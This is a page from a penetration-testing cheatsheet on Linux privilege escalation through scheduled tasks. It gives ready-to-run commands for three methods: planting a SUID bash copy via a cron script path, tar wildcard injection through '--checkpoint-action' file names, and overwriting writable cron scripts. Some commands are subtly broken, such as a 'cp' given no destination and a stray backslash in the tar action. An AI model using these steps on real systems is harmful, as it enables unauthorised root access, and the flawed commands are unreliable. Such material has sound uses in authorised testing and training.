coffeetohack
  • Introduction
  • Methodology
  • Cheatsheet
    • Ports
    • Nmap
    • Directory Bruteforce
    • Password Cracking
    • Web Server
    • Shells
    • TTY Shells
    • File Transfers
    • XSS | SQLi
    • LFI / RFI
    • File Uploads
    • Port Forwarding
  • Framework/Application
    • CMS Made Simple
    • Blundit
    • Wordpress
    • OctoberCMS
    • Tomcat
  • Windows PrivEsc
    • Scheduled Tasks
    • Stored Passwords
    • Installed Apps
    • Unquoted Service Path
    • Binary Paths
    • DLL Hijacking
    • Startup Apps
    • Executable Files
    • Registry
    • Run As
  • Linux PrivEsc
    • Sudo
    • SUID
    • Capabilities
    • Scheduled Tasks
    • NFS Root Squashing
    • Docker
  • Buffer Overflow
    • dostackbufferoverflow
    • BoF 1
    • Vulnserver
    • Brainpan
    • Brainstorm
  • Initial Shell Exploits
  • PrivEsc Exploits
  • Cisco Packet Tracer
  • Active Directory
    • Methodology
    • LLMNR Poisioning
    • Cracking Hashes
    • SMB Relay
    • IPv6 Attacks
    • PowerView
    • Bloodhound
    • Pass The Hash
    • Token Impersonation
    • Kerberoasting
    • GPP Attack
    • URL File Attack
    • PrintNightmare
    • Mimikatz
    • Golden Ticket Attack
  • OSINT
Powered by GitBook
On this page
  • CRON PATHS:
  • WILDCARDS:
  • FILE OVERWRITES:

Was this helpful?

  1. Linux PrivEsc

Scheduled Tasks

CRON PATHS:

Check the first path that is is executing. For ex: /home/user/. Check if the scheduled task file is present in that directory. If it is not present the create it.

If the file has extension .sh and in /home/user/ path:

echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > /home/user/file.sh
#Go to /tmp and wait for the scheduled task to run. Check the time using ls -la
#Then run the following:
/tmp/bash -p

WILDCARDS:

Check if any task is running with wildcard ( * )

Suppose tar is running with wildcard: tar czf /tmp/backup.tar.gz *

echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > runme.sh
chmod +x runme.sh
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\runme.sh
#Wait for the scheduled task to run
/tmp/bash -p

FILE OVERWRITES:

Check if we have write permissions on any of the schduled tasks. Then overwrite the file with a reverse shell. (Imp: Before overwriting the file, always copy the contents of the original file to some location)

echo 'cp /bin/bash > /tmp/bash; chmod +s /tmp/bash' > runme.sh
/tmp/bash -p

PreviousCapabilitiesNextNFS Root Squashing

Last updated 4 years ago

Was this helpful?